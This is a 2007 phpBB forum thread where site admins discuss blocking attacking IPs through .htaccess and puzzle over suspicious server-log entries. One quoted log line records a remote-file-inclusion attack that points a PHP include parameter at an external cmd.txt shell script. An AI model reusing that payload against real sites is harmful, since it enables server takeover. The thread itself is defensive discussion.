Sub Menu
Links Menu
Online Users

In total there are 352 users online :: 2 registered, 0 hidden and 350 guests

Most users ever online was 1091 on Wed Aug 16, 2023 5:27 pm

Registered users: Google [Bot], Majestic-12 [Bot] based on users active over the past 60 minutes

Security Flaw

This is where youll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

PostAuthor: Omni-Lee » Thu May 17, 2007 10:42 am

"ZacFields" wrote:These IP's need to be blocked from .htaccess to prevent them from running requests on your forum's files.


Can you be more specific as to what type of requests? I assume you don't mean sql as that wouldn't be considered minor.
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

Re: Security Flaw

PostAuthor: Frost » Thu May 17, 2007 4:50 pm

He means, any requests

If you ban the ips in htaccess in your root directory, they cant access anything beyond that point (your whole site is gone to them)

Note: if you put this in htaccess say 3 folders into your server it only affects from then foward

htaccess in root folder example

Access > [htaccess in root] > All Following Folders Denied

htaccess in later folder example

Access > Root > 2nd Folder > 3rd Folder > forum > [htaccess in forum] All Following Folders Denied

That way, an attacker would still have access to your root, 2nd, 3rd, and forum folders

That's how it works as far as I know
Last edited by Frost on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
[size=99px]PhpBB3 Themes[/url] ]PhpBB3 Development Center[/url] [/size]

Frost
Sr Integra Member
Sr Integra Member
 
Posts: 776
Likes: 0 post
Liked in: 0 post
Joined: Wed Sep 13, 2006 1:04 am
Cash on hand: 0.00
Location: Photoshop CS3

PostAuthor: ZacFields » Thu May 17, 2007 5:09 pm

Thanks Frost...I was kinda stumped a little when trying to think of how to explain a request.

Basically when you open a page in a forum, it performs a GET request for all the pieces of that page. Like the images, includes.php, all the aspect of that page. When you make a post...pretty much anytime you press the "submit" button it sends a POST request.

But for an example as to why you would want to ban things like this from .htaccess in your root: You all know what happens when you ban someone from your forum, right? Basically it opens up everything (all the requests still get performed) but IM software is written to recognize "hey, this guy is banned" and it sends them a nice little banned message saying that this site is banned.

But blocking from .htaccess, they can't even bother your server with requests because before they even get to your forums, or any file inside your forums your server itself recognizes that the IP is not supposed to be there so it actually prevents them from even seeing your site, or even performing any requests on the files in the same folder, or after your .htaccess file.

Hope that helps.

Zac
Last edited by ZacFields on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

ZacFields
Sr Integra Member
Sr Integra Member
 
Posts: 426
Likes: 0 post
Liked in: 0 post
Joined: Wed May 24, 2006 10:14 pm
Cash on hand: 0.00

PostAuthor: Omni-Lee » Thu May 17, 2007 7:54 pm

Thank you both for the de.scription.

CT is showing the attacks as slowing down, but they are still coming.

Todays:
17 May 2007 06:27 pm //includes/kb_constants.php?module_root_path=http://www.firp.it/smf/Themes/default/images/english/cmd.txt? libwww-perl/5.805 209.172.57.139

Another IP for the .htaccess file.

While scanning the server logs I found the following:
193.232.119.173 - - [17/May/2007:05:21:21 -0400] "GET //<siteURL>//<siteURL>/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844 HTTP/1.1" 404 2351 <siteURL> "http://<siteURL>//<siteURL>//<SiteURL>/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"

What do you make of it? It feels fishy, but I'd like confirmation.
Last edited by Omni-Lee on Fri May 18, 2007 8:55 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

PostAuthor: nGAGE » Fri May 18, 2007 8:40 am

"Omni-Lee";p="25525" wrote:While scanning the server logs I found the following:
193.232.119.173 - - [17/May/2007:05:21:21 -0400] "GET //www.mithrilcrowns.net//www.mithrilcrowns.net/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844 HTTP/1.1" 404 2351 http://www.mithrilcrowns.net "http://www.mithrilcrowns.net//www.mithrilcrowns.net//www.mithrilcrowns.net/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"

What do you make of it? It feels fishy, but I'd like confirmation.

Looks like somebody's profile is being used to GET something through there or something... dunno and i'm not gonna go to that link either ;)
Last edited by nGAGE on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
[url=http][img=left]http://www.net-clan-gaming.eu/ftp/ngage/images/nEt_v3_sig.png[/img][/url]
User avatar
nGAGE
Sr Integra Member
Sr Integra Member
 
Posts: 248
Likes: 0 post
Liked in: 0 post
Joined: Mon Mar 27, 2006 6:28 am
Cash on hand: 0.00

Previous

Return to Forum Security

Who is online

Registered users: Google [Bot], Majestic-12 [Bot]

cron